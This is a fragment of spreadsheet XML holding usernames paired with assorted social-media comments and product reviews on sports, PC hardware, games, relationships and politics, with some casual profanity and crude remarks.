    <t>Do you rip them from the game files or just look online?</t>
  </si>
  <si>
    <t>ScissorMeTimbers69</t>
  </si>
  <si>
    <t>Ya I think its still going to be a shootout where they have to pass to keep up a lot</t>
  </si>
  <si>
    <t>Southndiggr</t>
  </si>
  <si>
    <t>So, because long ago pork products soiled easily, now we have an entire section of the population that will NEVER know the joy of a BLT...for spiritual belief reasons?</t>
  </si>
  <si>
    <t>dinyell_wonky_eye</t>
  </si>
  <si>
    <t>&gt;&gt;110096458 &gt;&gt;110106798 The original Secret Wars was made like this and I love it.</t>
  </si>
  <si>
    <t>Earthmine52</t>
  </si>
  <si>
    <t>Theory: Flash Forward, Wally West's connections to Dr. Manhattan, what really happened in HiC?</t>
  </si>
  <si>
    <t>Nobli85</t>
  </si>
  <si>
    <t>No problem. The 3700X uses the same amount of power as 2600 so if you upgrade you can still keep that power supply. Just do a bios update to make sure your motherboard has no trouble with the new chip.</t>
  </si>
  <si>
    <t>ttthroowwaway</t>
  </si>
  <si>
    <t>Thank you so, so much. From the bottom of my heart, thank you. It really helps hearing the facts laid out from a third party (instead of my emotional mess of a brain right now), and that you’d take time out of your day to help me right now. Thank you.</t>
  </si>
  <si>
    <t>TheBigManTyrone</t>
  </si>
  <si>
    <t>It’s okay! I was able to fix it.</t>
  </si>
  <si>
    <t>deadtonguesss</t>
  </si>
  <si>
    <t>we got lucky, we dont look good today at all. Hopefully better in the second half.</t>
  </si>
  <si>
    <t>KCnVEr</t>
  </si>
  <si>
    <t>" This is a review site that's definitely showing genuine customer feedback unlike another rival site that's full of fake reviews generated by these scam artists. This truly dreadful company serves it's own interests and not for their customers. Slow to respond to emails or to provide updates but quick to demand payment. They engage in illegal activities such as forming a pact with the heating company by ramping up the unit price by over 200% without consulting the any of the residents and how much commission did they make? This is breaking the law as Section 20 of the landlord and tenants act 1985 explicitly states that residents must be consulted for contracts that are 12 months minimum or qualifying works where residents have to pay £100 each. This will be looked into. They also can't manage the property either since our boilers have failed as well. A disaster of a company and would urge residents of other properties to seek elsewhere and avoid. "</t>
  </si>
  <si>
    <t>RosaPalms</t>
  </si>
  <si>
    <t>But Kanye didn’t even do anything big enough to warrant the comparison. Kanye was annoying and ill-informed politically and bad at communicating. R. Kelly raped teenagers. Even making the comparison is offensive and disgusting.</t>
  </si>
  <si>
    <t>BanginDrumsNMums</t>
  </si>
  <si>
    <t>My wifes ass.</t>
  </si>
  <si>
    <t>fitfan90</t>
  </si>
  <si>
    <t>I used to take 90 mgs Vyvanse in morning and around 2 another 30 for a total of 120. It’s stupid I know and don’t do it anymore but I was always fine.</t>
  </si>
  <si>
    <t>cookingboy</t>
  </si>
  <si>
    <t>&gt;You'd be giving up so much for so little. You just described the 1% who buys top of the line Porsche models. In the end this will sell well and still make tons of money for Porsche, and that's all that matters to them.</t>
  </si>
  <si>
    <t>jonman</t>
  </si>
  <si>
    <t>My last HP printer worked great for 9yrs.For me HP is the only printer that i will ever buy. [This review was collected as part of a promotion.]</t>
  </si>
  <si>
    <t>&gt;give new comfy village &gt;60% of the story quests send you back to astera automatically</t>
  </si>
  <si>
    <t>AlanR75</t>
  </si>
  <si>
    <t>Tried this at first in can it don't look B/ white but dried a good white Matt finish 2 coats on new plaster and it covered will buy again</t>
  </si>
  <si>
    <t>DarkFireRogue</t>
  </si>
  <si>
    <t>It looks like Grandma, the fuckin thing</t>
  </si>
  <si>
    <t>Something_Syck</t>
  </si>
  <si>
    <t>they are slavic in spirit and temperature</t>
  </si>
  <si>
    <t>Alvatore</t>
  </si>
  <si>
    <t>&gt; Spend this day with your loved ones. Don't need to spend time with loved ones if you don't have any.</t>
  </si>
  <si>
    <t>CarinaPDX</t>
  </si>
  <si>
    <t>I have been lusting after a 45# Vulcan for some time. It fits on a bow roller alongside the bowsprit quite nicely, self-launches, and should hold as well as or better than any other anchor. The Vulcan | Rocna® Anchors Let me win and I promise to be a good boy!</t>
  </si>
  <si>
    <t>Clarett</t>
  </si>
  <si>
    <t>I hope this is sarcasm that looks like shit...</t>
  </si>
  <si>
    <t>JadenTheGayden</t>
  </si>
  <si>
    <t>We both do sometimes but I don’t really wanna give information.</t>
  </si>
  <si>
    <t>thematrixhazuneo</t>
  </si>
  <si>
    <t>Scratches at a level 6...Deeper grooves at a level 7</t>
  </si>
  <si>
    <t>kschaffner</t>
  </si>
  <si>
    <t>Greetings all, Looking to downsize some spare parts and my lab itself here soon. All RAM was tested using the latest version of memtest on Dell R720's. CPU's are working pulls. All prices including USPS Priority shipping! [Heatware 117-0-0](https://www.heatware.com/u/45949/to) [Timestamps](https://imgur.com/a/bfy8Q9M) Make | Model | Description | QTY | Price Per | Pair Price ---|---|----|----|----|---- Intel | X5680 | 3.33GHz 6-core LGA1366 130W | 6 | $40 | $70 Vantec | MRK-M3503T | EZ Swap M3500 series 2x5.25 to 3x3.5 | 1 | $40 Brand | Model | Capacity | Type | Speed | Rank | Quantity | Voltage | Price Per Module | Multi-Piece Price Per Module ---|---|---|---|---|---|---|---|---|--- Samsung | M393B2K70CM0-YF8 | 16GB | DDR3-PC3L | 8500/1066 | 4Rx4 | 30 | 1.35V/1.5V | $20.00 | $17.50 | | | | | | | | | Hynix | HMT31GR7EFR4C-RD | 8GB | DDR3-PC3 | 14900/1866 | 2Rx4 | 14 | 1.5V | $20.00 | $18.00 Samsung | M393B1K70CH0-YH9 | 8GB | DDR3-PC3L | 10600/1333 | 2Rx4 | 2 | 1.35V/1.5V | $10.00 | $8.00 Hynix | HMT31GR7CFR4A-H9 | 8GB | DDR3-PC3L | 10600/1333 | 2Rx4 | 2 | 1.35V/1.5V | $10.00 | $8.00 Samsung | M393B1K73CH0-CF8 | 8GB | DDR3-PC3 | 8500/1066 | 4Rx8 | 25 | 1.5V | $10.00 | $8.00 Micron | MT36KSF1G72PDZ-1G1K1FF | 8GB | DDR3-PC3L | 8500/1066 | 4Rx8 | 6 | 1.35V/1.5V | $10.00 | $8.00 Micron | MT36KSF1G72PDZ-1G1M1HG | 8GB | DDR3-PC3L | 8500/1066 | 4Rx8 | 12 | 1.35V/1.5V | $10.00 | $8.00 Samsung | M393B1K70DH0-YH9 | 8GB | DDR3-PC3L | 10600/1333 | 2Rx4 | 3 | 1.35V/1.5V | $10.00 | $8.00</t>
  </si>
  <si>
    <t>QCongress83216</t>
  </si>
  <si>
    <t>Quote: Originally Posted by MaskedRacer Have not been in CLE area that long but have found the local grocery stores to be disappointing. This does not include Costco, aldi, or national places like that. Heinens, Marcs, Giant Eagle is what I am referring to. What a let down, they all think. Such inferior to places like Food Lion and Kroger which are in other cities. Those are awesome grocery stores. Too bad CLE does not have them. Spoken like a true, spoiled Southerner jk lol .</t>
  </si>
  <si>
    <t>MyPornoAlt404</t>
  </si>
  <si>
    <t>Uh... Furry Porn Games...</t>
  </si>
  <si>
    <t>emmito_burrito</t>
  </si>
  <si>
    <t>Wtf is that socialist area in agrica</t>
  </si>
  <si>
    <t>CornersTheCoder</t>
  </si>
  <si>
    <t>I love the celebration and I love this! Not sure which I love more.</t>
  </si>
  <si>
    <t>CrackCocaineShipping</t>
  </si>
  <si>
    <t>I got a 22 on my practice asvab but after I bought the for dummies book and studied the shit out of it I got an 86. Granted I was 3 years out of school straight to work.</t>
  </si>
  <si>
    <t>YuriCharles</t>
  </si>
  <si>
    <t>it’s my 22nd birthday today ! 09/25♎️ even though I’m pretty bummed out considering I couldn’t find an affordable prenatal massage , all my friends don’t live in miami anymore ( moved 4-7 hours+ away for college ) , &amp; all my family lives in the islands my Bestfriend said I should be happy I’m alive😅 . So here’s to 22 years breathing &amp; happy 7 months to my unborn baby girl💕 can’t wait to meet her in December💖 . PS: no I didn’t get the chance to get my hair done or pamper myself so I’m jus ordering take out &amp; sleeping , I don’t have the energy to do much nowadays anyway . The most I do is go for a walk mainly bc my baby girl is still breeched and I desperately need her to turn bc she’s already huge ( 1 &amp; 1/2 week/weeks ahead of her growth rate , already 3-3 &amp; 1/2lbs ) &amp; after that I’m exhausted</t>
  </si>
  <si>
    <t>Jtyler131</t>
  </si>
  <si>
    <t>The PSP rocked, games like Daxter, crisis core, KH birth by sleep, peace walker like you mentioned made it a must have for me. Would have been really cool to see what could have been with RE on it.</t>
  </si>
  <si>
    <t>Steak_Daddy_</t>
  </si>
  <si>
    <t>[How about this? Better?](https://media.giphy.com/media/Tg0MCaqH3sFUDqzrVX/giphy.gif) When car tires explode the don't make fire.</t>
  </si>
  <si>
    <t>vexorian2</t>
  </si>
  <si>
    <t>I think they just didn't care.</t>
  </si>
  <si>
    <t>lishavirgo32</t>
  </si>
  <si>
    <t>I am! I didn't think I can do it. I'm determined though. Good luck</t>
  </si>
  <si>
    <t>glider97</t>
  </si>
  <si>
    <t>Cool, man, I'll tell all my cab driving friends. Maybe put an announcement ad in the papers. You're expecting a dude that is **driving cabs to earn a living** to put in the effort to learn a language? But the thought won't occur to you that if you're visiting new land you should maybe expect language difficulties? Maybe prepare for it?</t>
  </si>
  <si>
    <t>&gt;&gt;10984548 Canadafag here. You seem to know what you're talking about. Hypothetically if I do med school in the UK or Aus and want to match to a psyc program in the USA, how do I select which programs I'd have the best shot at? Are there programs that are IMG friendly? Also if STEP 1 isn't made P/F, worst case scenario, what should I do if I majorly fuck up step 1? Like I know I should be aiming for 230+ but lets say I score a 205 or some horrible score. Is it still salvageable? Psych is all I want. Did my undergrad in it, research experience in a psyc lab, would do lots of rotations in psychiatry if I did go to med school. In other words any PD would be able to tell that I am not choosing psych as a back up because I didn't get into some sort of ultra competitive specialty. I really just like it. What do?</t>
  </si>
  <si>
    <t>The Great Weise</t>
  </si>
  <si>
    <t>I think Pettersson is awesome and better than Kotkaniemi, but I seriously doubt he would score over 50 points if he had Lehkonen and Armia as his linemates.</t>
  </si>
  <si>
    <t>Gaon</t>
  </si>
  <si>
    <t>Ain't over 'til it's over . I am proud people are standing up against it, though. Speaking of patriotism, what this election has brought (on top of everything else) is an upswing in the Northeast vs South split of always (the Northeast being the only region where the left won hands-down). As a Northeastern, it is hard not to identify myself increasingly less as a Brazilian and more and more as a Northeastern in times such as these. Edited by Gaon on Sep 7th 2019 at 5:25:20 AM " Cobras Fumantes eterna é sua vitória! "</t>
  </si>
  <si>
    <t>wjlaw100</t>
  </si>
  <si>
    <t>in the year 2000..... errr.... 3000</t>
  </si>
  <si>
    <t>i_use_3_seashells</t>
  </si>
  <si>
    <t>I don't think the model should ignore that bump, but generating a &gt;20th order polynomial function of one variable as your model is absolutely overfitting.</t>
  </si>
  <si>
    <t>bobloblaw1717</t>
  </si>
  <si>
    <t>What was the point of buying two centers lol</t>
  </si>
  <si>
    <t>AnAverageASEANguy</t>
  </si>
  <si>
    <t>Cable management will be easier in RGB'ed rigs by black-taping the cables together.</t>
  </si>
  <si>
    <t>GlengoolieGreen</t>
  </si>
  <si>
    <t>Man, if it’s anything like the movie I’ll take it.</t>
  </si>
  <si>
    <t>Brfoster</t>
  </si>
  <si>
    <t>My parents made me watch SPR when I was like 14 because they wanted me to see “real war,” due to me playing a lot of games like Call of Duty. Holy shit I bawled like a baby pretty much the entire movie. The medic scene and the knife scene still get me.</t>
  </si>
  <si>
    <t>MoopyMorkyfeet</t>
  </si>
  <si>
    <t>Thats an OG reference, bless</t>
  </si>
  <si>
    <t>ben--dover123</t>
  </si>
  <si>
    <t>I’m not the street guy to (hand movements)</t>
  </si>
  <si>
    <t>&gt;&gt;476335840 Oh hey, I was just about to come in here and ask that myself.</t>
  </si>
  <si>
    <t>lostn</t>
  </si>
  <si>
    <t>How long do you wait before you shower, after a full body paint?</t>
  </si>
  <si>
    <t>Reduxy</t>
  </si>
  <si>
    <t>Not even mad about the standings. Dak been balling.</t>
  </si>
  <si>
    <t>Marconius1617</t>
  </si>
  <si>
    <t>Just copy and paste Krennic into this game please. I miss him so much.</t>
  </si>
  <si>
    <t>Fakezaga</t>
  </si>
  <si>
    <t>I liked the pizza and they have beer. Only one kind - propeller pilsner. Good pizza, beer, decent price and an all-around fun vibe.</t>
  </si>
  <si>
    <t>Hwillis35</t>
  </si>
  <si>
    <t>I (25 male) have dated my ex girlfriend (24 female) for over a year when she finally ended it. I’m not going to go into specifics but I started to develop chronic health issues to the point that we couldn’t do anything meaningful anymore and it really strained our interactions throughout the relationship. It stressed her out to the point that she ended it because she was incredibly unhappy. She told me she loved me and that she is going to keep in contact with me to see how my health is progressing. We have been broken up for a month and a half now. I hear from her maybe every 2 - 3 days nothing very meaningful just her asking how I am doing. My birthday was two weeks ago and she tells me she wants to take me out for my birthday to go eat. I gladly accept the offer but when the day comes she is in the hospital from over drinking alcohol the night before. I call her that night to check on her but she tells me she can’t really talk and she can’t come see me because she’s feeling too weak and sick. I find out on Facebook that she went to hang out with friends that night. It hurt a little. She didn’t lie about the hospital visit but she still did stuff with friends when she said she couldn’t even talk to me on the phone. At the end of that night she texted me saying “Thinking about you, I’ll call you tomorrow to make up for tonight.” Tomorrow came around and I hadn’t heard from her all day. So I texted her asking if she still wanted to do that call. She said yeah she’s busy though so she called me for 5 minutes before she went to hang out with friends again. I just accepted it, glad that she even called. She told me next weekend she will actually take me out since she was sick that weekend and couldn’t do it. This weekend came up and she texts me about something totally unrelated. We text back in forth a little and she doesn’t mention taking me out so I just mention if she wants to call tonight I really want to talk. She says “Yeah maybe! We will see”. That was last night and I haven’t heard from her since. She leaves me waiting for a call and doesn’t tell me that she isn’t able to or doesn’t even leave a follow up text the next day apologizing for leaving me waiting. It’s so frustrating. And on top of that, again she forgets about taking me out for my birthday. She complains to me that she can’t find any decent guy friends because they all want to sleep with her. But here I am, telling her I can be a friend who she can talk through all her problems with. I’m not going to try to win her back or sleep with her. Yet she treats me worse than a friend. She’s constantly telling me she is going to do things and never follows through with it. I don’t expect anything from her since we aren’t dating but at least respect me enough to keep your promises. She just gets my hopes and makes me think she cares. She says she does, but her actions clearly say otherwise. I think I’m just going to leave her on read the next time she texts. I can’t do this anymore. This isn’t the same girl I use to date. Any advice on the situation?</t>
  </si>
  <si>
    <t>BassistBenoit</t>
  </si>
  <si>
    <t>Right?? I sold my last one farrrr before it's life will end, always regret it</t>
  </si>
  <si>
    <t>Andy</t>
  </si>
  <si>
    <t>I needed a cheap hose for a low pressure watering setup. This has turned out to be a pretty good alternative to the pricey lifetime guarantee hoses for well under half the cost of most of them. It does what you expect out of a hose (carry water) just fine. It may not last forever but for my use and not being left outside or in the sun it will do just fine.</t>
  </si>
  <si>
    <t>PazJohnMitch</t>
  </si>
  <si>
    <t>Someone just broke the First Law.</t>
  </si>
  <si>
    <t>elephantviagra</t>
  </si>
  <si>
    <t>&gt; A monument to racism an stupidity. Are we talking about Trump, or the wall?</t>
  </si>
  <si>
    <t>bossmt_2</t>
  </si>
  <si>
    <t>I still can't help but wonder what could have been if Morris went to Germany instead of staying in MLS. Of course his injury was HUGE. But you have to wonder if he was forced to hone his skill more if he wouldn't be a bit better.</t>
  </si>
  <si>
    <t>&gt;&gt;95376457 The Chiefs will do that to your mind</t>
  </si>
  <si>
    <t>&gt;&gt;54312094 Bitch please, andro gang</t>
  </si>
  <si>
    <t>cats4ever</t>
  </si>
  <si>
    <t>Dear Hermione, what a beautiful girl you are. Your coat with those pretty markings looks so soft, and your face, with those big, big eyes is adorable. I'm glad that you were rescued from an uncertain future. And now you get to grow up safely and loved. You purr loudly, and you love to be held. You also let your person know when it is time to fill the food and water bowls. Hermione, you are a precious kitten and you are well on your way to grow into a magnificent feline. I wish you and your family a great day full of celebration, and many more happy and healthy years together.</t>
  </si>
  <si>
    <t>Cat5428</t>
  </si>
  <si>
    <t>That just horrible, I read the post and like a least half the comments. The post was clearly serious and it was a really insensitive question especially with that username.</t>
  </si>
  <si>
    <t>Tabata! Stop with the innuendo</t>
  </si>
  <si>
    <t>SadSalamander5</t>
  </si>
  <si>
    <t>Obviously, the best part is the endorphin-induced numb that comes after they scrape the base of your teeth and hit your gums. The rougher, the better it is.</t>
  </si>
  <si>
    <t>ToastyMozart</t>
  </si>
  <si>
    <t>Wait when did someone post my drawings to Pixiv?</t>
  </si>
  <si>
    <t>CyanideCat23</t>
  </si>
  <si>
    <t>Yep, that is indoctrination. Bringing a kid to a sexual parade with political messages... That's fucked up. That is political pedophilia.</t>
  </si>
  <si>
    <t>&gt;&gt;228026811 based corean</t>
  </si>
  <si>
    <t>murrriii</t>
  </si>
  <si>
    <t>No excuses for losing points at home from now. Hope the lads pull through a W with a spell of good football! Shit dropped points, Chelsea/Liverpool are going to lose points, hopefully West Ham give Utd a tough showing, COYG no excuses!</t>
  </si>
  <si>
    <t>OcelotWolf</t>
  </si>
  <si>
    <t>[For Sale] Three different Penguins outdoor game jerseys and a Team Canada 2014 Olympics replica!</t>
  </si>
  <si>
    <t>DeFactoidd</t>
  </si>
  <si>
    <t>Oof she’s sexy!</t>
  </si>
  <si>
    <t>Jantonsoup</t>
  </si>
  <si>
    <t>So I just got a new EVGA rtx 2060 super graphics card for my several years old build. The psu is my original 550W power supply that I got when I first built the pc (maybe 4-5 years ago). I put the graphics card in my motherboard, and finally went to plug in a pci-e cable. To my dismay and confusion, the graphics card had a single 8 pin socket, and I quickly realized I didn't have anything to fit in it. My psu only provides one 8 pin cable and its being used to power my cpu. I have two available 6 pin cables, and I ordered a dual 6-pin to 8 pin adapter off amazon. The reviews say the adapter works, but i was just hoping to get some other opinions on this. Its a good graphics card and I don't want to damage it or anything, and will get a new psu if I NEED to, but preferably not. TLDR: My 550W psu doesn't have any 8 pin pci-e cables for my rtx 2060 super, so was wondering if I could use a dual 6-pin to 8-pin adapter. adapter: [https://www.amazon.com/gp/product/B00M49SELW/ref=ppx\_yo\_dt\_b\_asin\_title\_o00\_s00?ie=UTF8&amp;psc=1#customerReviews](https://www.amazon.com/gp/product/B00M49SELW/ref=ppx_yo_dt_b_asin_title_o00_s00?ie=UTF8&amp;psc=1#customerReviews)</t>
  </si>
  <si>
    <t>itsnotaporpose</t>
  </si>
  <si>
    <t>I’m far from creative when it comes to the kitchen and I’m tired of eating the same things all of the time. I am a junior in college and live in an apartment. I don’t have a majorly huge budget for food but I just cook for myself so I can get by in a week with about $100 of groceries. If anyone can help me decide on what to make or give me some ideas, it would be greatly appreciated!</t>
  </si>
  <si>
    <t>bigwigjb</t>
  </si>
  <si>
    <t>"Hefty force flex"</t>
  </si>
  <si>
    <t>Mcoyle777</t>
  </si>
  <si>
    <t>No aslong as you still take the black pepper extract, you should be fine.</t>
  </si>
  <si>
    <t>Relodwire</t>
  </si>
  <si>
    <t>Did you read the definition of the offensive line adjusted yards? It assigns responsibility to the O line based on how long the gain was. Losses put 120 percent of the blame on the O line. So when Saquon dances around the line and causes a potential short gain into a 0 yard gain or a loss this metric assigns all of that to the O line. In short. Your running back is making your offensive line look worse in this metric while it shows that Zeke is taking what the line gives him and breaking it when the opportunity is there instead of harming the team by looking for it.</t>
  </si>
  <si>
    <t>trippiesol</t>
  </si>
  <si>
    <t>yo i'm so excited to hear this live in December!!!</t>
  </si>
  <si>
    <t>YellowInvasion</t>
  </si>
  <si>
    <t>Y'know, stereotypes such as having small dicks, being shy, meek, effeminate, physically weak, asexual, work-driven robots with no personality, etc. It's stereotypes like those that are often portrayed in social media to describe the East Asian male population. Therefore I have to ask all you non-Asian gaybros, do you seriously believe that such a large group of people (with Asians making up 59.67% of the world population) are the exact epitome of those stereotypes? I mean, I don't deny that *some* Asians embody those stereotypes to a certain degree, but to the people that say ALL Asians are those exact stereotypes only shows how utterly ignorant they are. In fact, if you take a look at Asia's total population of 4.4 billion (with half of that being males, so 2.2 bil) which is three to four times that of Europe's population of 747 million (half being males, 373 mil), it's only logical to say from a numbers perspective that there are, in fact, *more* masculine Asian males than White males overall. It's hard to believe, I know. It's just that the media doesn't portray it that often, if ever at all. In addition to that, the rise of K-pop (effeminate-looking males) in the Asian media only perpetuates those stereotypes even more, and hence inevitably make outsiders believe this is how the average Asian male probably looks... which can't be further to the truth. I mean, I've been to South Korea before. Most of the men that I saw around me looked nothing like those effeminate K-pop boys. In fact, to my surprise I saw a decent amount of Korean men that were quite huge, beefy, hunky, and had an overall masc vibe about them. Therefore, you shouldn't believe everything that you see in the media. Most often times than not, the media manipulates you at the subconscious level which in turn warps your perception between illusion and actual reality. Indeed, it's true that the Asian race is, on average, more "neotenic" than other races and hence some of them might not completely grow into their looks beyond their expected age. For those of you that don't know that term, neoteny is basically the retention of youthful facial features beyond early adulthood and onwards. Obviously, this doesn't apply to ALL Asians given the large Asian population. This is why sometimes you'll see *some* Asians in their mid 30's looking like they're in their late teens. The neotenic traits could both be a blessing and a curse depending on how you look at it. The good news is that as soon as those Asians reach their 40's, they start growing more into their full potential and end up looking mid-20's at best. In other words, it's around those ages when Asian men reach their prime time where they finally get to shine. Another point I'd like to make is that since the Asian male population far exceeds the White male population, that means there are also much more masc Asians, as well as femmy Asians, and everything else in between - as opposed to their White counterpart. This is simply all due to having a larger population, so it's bound that there's a larger range of different kinds of men of varying sizes, shapes, and personality traits, if that makes any sense.</t>
  </si>
  <si>
    <t>Jxcob_GG</t>
  </si>
  <si>
    <t>What about relic shield? Is it worth upgrading it to aspect or just leaving it at level 2</t>
  </si>
  <si>
    <t>Lujho</t>
  </si>
  <si>
    <t>Oh wow! I didn't realise that this finally provided a legit way to watch 3D feature films on the Quest! That's great news. I'm surprised they didn't make a bit bigger of a deal about it. Unfortunately I'm in one of the blocked regions, but still.</t>
  </si>
  <si>
    <t>npearson</t>
  </si>
  <si>
    <t>There are times when I want the fast shooting and viewfinder of a dslr, and other times where I'd prefer the compactness and low focal ratios aloud by a mirrorless camera. Hopefully this performs as well as both and isn't some Frankenstein's monster that can't do either very well.</t>
  </si>
  <si>
    <t>Redmonster111</t>
  </si>
  <si>
    <t>Here we go again with the broken record of attacking ones character instead of defending their arguments. Don't give me that with "Like, how shitty must your life be for you to resort to ranting at a 5 month old downvoted post for kicks?" You are the one who came back. You could have left the comment alone. It's good that people leave matches early. If someone dosn't want to play they are just going to sit in the game and do jack digity (rather than leave and get either banned or all their ranks reset). You would bassically be promoting shitty players to just do nothing in the lobby rather than have them leave and have a chance of getting better players who give a damn.</t>
  </si>
  <si>
    <t>DorkNow</t>
  </si>
  <si>
    <t>it's not that much materials and can be built pretty easily if you have the plan</t>
  </si>
  <si>
    <t>Tyler_Potts_</t>
  </si>
  <si>
    <t>Thanks for the feedback I'll keep that in mind and apply to the next video.</t>
  </si>
  <si>
    <t>pcmeiners</t>
  </si>
  <si>
    <t>Close models. I searched google ..... Jet 8 (images) https://www.ebay.com/itm/Jet-JDP-8-D...ss!10306!US!-1 https://ozarktoolmanuals.com/machine...-parts-manual/ http://darkfall.me/jet-drill-presses...and-17-review/ If you go forward with the rebuild I would replace the bearing. Good luck</t>
  </si>
  <si>
    <t>naked_as_a_jaybird</t>
  </si>
  <si>
    <t>At least Ian Moran was from Cleveland. Oh, wait...</t>
  </si>
  <si>
    <t>NexusI</t>
  </si>
  <si>
    <t>And they, shall know no fear.</t>
  </si>
  <si>
    <t>BSpacer</t>
  </si>
  <si>
    <t>I need a steel type personally. Some bionic eevee! I don’t think they’d introduce a new Eevee in sun and moon now do you?</t>
  </si>
  <si>
    <t>missuncleben</t>
  </si>
  <si>
    <t>Press F for peopel who were home schooled</t>
  </si>
  <si>
    <t>G1xtch_L0b0</t>
  </si>
  <si>
    <t>Noice, tokyo ghoul’s alright, death note’s eh attack on titan and alchemist brotherhood is</t>
  </si>
  <si>
    <t>Ghost434</t>
  </si>
  <si>
    <t>I know it’s a long shot, but if Trump is removed from office does that bar him for running for a second term?</t>
  </si>
  <si>
    <t>khaledm05</t>
  </si>
  <si>
    <t>i joined for the memes, stayed because of the ui. i love the fact of subreddits and groups of people who are interested in the same thing, and most of them are really helpful. if you need something specific u can just ask the dedicated subreddit and you’ll probably get your answer.</t>
  </si>
  <si>
    <t>pussynpills</t>
  </si>
  <si>
    <t>Not a myth check my post</t>
  </si>
  <si>
    <t>Deadhawk142</t>
  </si>
  <si>
    <t>The Swastika is a sacred symbol in Hinduism, Buddhism and Jainism. It is also a sign of spiritual purity. The swastika was a letter in the ancient Sanskrit language. It meant luck or well being. It is also found on Byzantine buildings, Ancient Greek coinage and in Native American burial sites.</t>
  </si>
  <si>
    <t>BoyWithLongHair</t>
  </si>
  <si>
    <t>It's so nice to see Moth smiling!</t>
  </si>
  <si>
    <t>&gt;&gt;17772894 His jokes are fine, it's the way he tells them that's not great.</t>
  </si>
  <si>
    <t>Mychael612</t>
  </si>
  <si>
    <t>I'd go so far as to say it usually isn't.</t>
  </si>
  <si>
    <t>trillrollers</t>
  </si>
  <si>
    <t>How do you know when I became aware of Herro? And besides it’s not like Alexander-Walker is on the table so why keep bringing him up?</t>
  </si>
  <si>
    <t>ff2003</t>
  </si>
  <si>
    <t>Welcome! I appreciate the intertwining guitar work Ms. Lund &amp; Ms. Shapiro plays on a few songs played live on KEXP at different dates. The two guitars remind me of the playing between Tom Verlaine and Richard Lloyd, Michael Jung and Dave Giffen. I’m looking forward to seeing the band perform live in town in a few weeks. A couple questions for Ms. Shapiro. Has your voice gotten higher in pitch? In “Black Sails” it sounds lower, compared to “Joke”. How did you pick one Fender model over another, for example the Jaguar over the Telecaster? Thank you in advance Ms. Shapiro. Looking forward to seeing Chastity Belt in Brooklyn.</t>
  </si>
  <si>
    <t>AlanMtz1</t>
  </si>
  <si>
    <t>Not at all, which raises the question, what is going on at Barca that wasnt at Rennes or Dortmund? Imo its a combination of his immaturity, but also our lack of general physical preparation and training, as is apparent in our matches and the fact Spalletti once heavily criticized the way Barca players warmed up before their CL matches against Inter</t>
  </si>
  <si>
    <t>DualKoo</t>
  </si>
  <si>
    <t>Well the page with the guy's giant glass orb says "Enlightened Fallen King" probably refers to Endeavor as the king could apply to his role as the number one hero, Enlightened could refer to his new outlook on life and trying to change to be better, and fallen.... This will probably be the Fall of Endeavor Arc or something like that.</t>
  </si>
  <si>
    <t>XstarshooterX</t>
  </si>
  <si>
    <t>Nah, this is similar to last year's week 3</t>
  </si>
  <si>
    <t>Un1k0rn</t>
  </si>
  <si>
    <t>RELSPI said: OUR SPECIES IS ENTIRELY MALE (AS OPPOSED TO COMPLETELY FALSE HUMAN BELIEFS) AND IT IS ENTIRELY NORMAL FOR HUMANS TO BE ATTRACTED TO US ALSO @RELSPI IS REALLY COOL AND EPIC AND SHE SHOULD TOTALLY BE ABLE TO FLY ONE OF OUR SHIPS It's a good thing I'm a unicorn then.</t>
  </si>
  <si>
    <t>Jartini18</t>
  </si>
  <si>
    <t>Apart from the saber combat, SWBF2 is actually a satisfying and enjoyable game</t>
  </si>
  <si>
    <t>EmmaR22</t>
  </si>
  <si>
    <t>I was on the bridge just north of Pearl Street. From Ah Nab Awen Park to Lyon St.</t>
  </si>
  <si>
    <t>ptowner7711</t>
  </si>
  <si>
    <t>Never said they were. The writer is taking the term too literally. It all falls under outrage culture. A failed attempt to "cancel" someone is still an attempt nonetheless. Too many bad actors on both reaches of the political spectrum trying to ruin the lives of people who hold opposing opinions to what they believe.</t>
  </si>
  <si>
    <t>aaronjamesgray</t>
  </si>
  <si>
    <t>Originally posted by travelswsage Here is one in color I think came out ok. At first I wasn't sure if I liked it, but after studying it for a while it does look like a still shot from an anime. It's art. I'm not sure that it's the kind of style that I'd like to shoot but I can see why people might like it. Not bad.</t>
  </si>
  <si>
    <t>Any estimates what the points will be for S2/S3? Haven't really seen what the high rankers got up to</t>
  </si>
  <si>
    <t>Xstitchpixels</t>
  </si>
  <si>
    <t>Anything derived from petroleum</t>
  </si>
  <si>
    <t>jyanseisei</t>
  </si>
  <si>
    <t>I'm pretty sure we got enough cowboy movies.</t>
  </si>
  <si>
    <t>stopped_watch</t>
  </si>
  <si>
    <t>Hey brother, so sorry to hear. I know telling my boys was the hardest thing in my life and seeing what it did to them was awful. A few months on and they've adjusted. Both my ex and I have made it clear every step that we love them very much and that it was our fault for breaking up, nothing to do with them at all. Remember I have space for you to crash if you want to get away. You've been a good friend and an inspiration to me.</t>
  </si>
  <si>
    <t>Pointless_Porcupine</t>
  </si>
  <si>
    <t>The Bret Weinstein Evergreen controversy [https://www.youtube.com/watch?v=FH2WeWgcSMk](https://www.youtube.com/watch?v=FH2WeWgcSMk) The James Damore Google memo controversy [https://www.youtube.com/watch?v=87e1aXxruTo](https://www.youtube.com/watch?v=87e1aXxruTo) These videos are a bit long but illustrate a few great examples. Other examples from the top of my head: Since we're on the JPB sub: Jordan Peterson has been labelled sexist over and over again for simply referring to scientific studies about the psychological differences between men and women. He didn't make this up himself and there is an entire field of study called evolutionary psychology that explores this scientifically. Sam Harris is often labelled as a racist for making remarks about the risks associated with some elements of islamic doctrine and criticizing some of its dogmatic beliefs. It's not racist to criticize religious dogmatism, despite many people claiming it is, by definition. You might not agree with what any of the people listed above did and said, and that's fine. But none of them had any racist or sexist intentions, yet they still got vilified as such.</t>
  </si>
  <si>
    <t>BoumilCz</t>
  </si>
  <si>
    <t>Can you install it on the switch, your (non-apple) phone or heck, even a smart fridge?</t>
  </si>
  <si>
    <t>definework</t>
  </si>
  <si>
    <t>probably because the guest was a jerk about it.</t>
  </si>
  <si>
    <t>MiladyBanana</t>
  </si>
  <si>
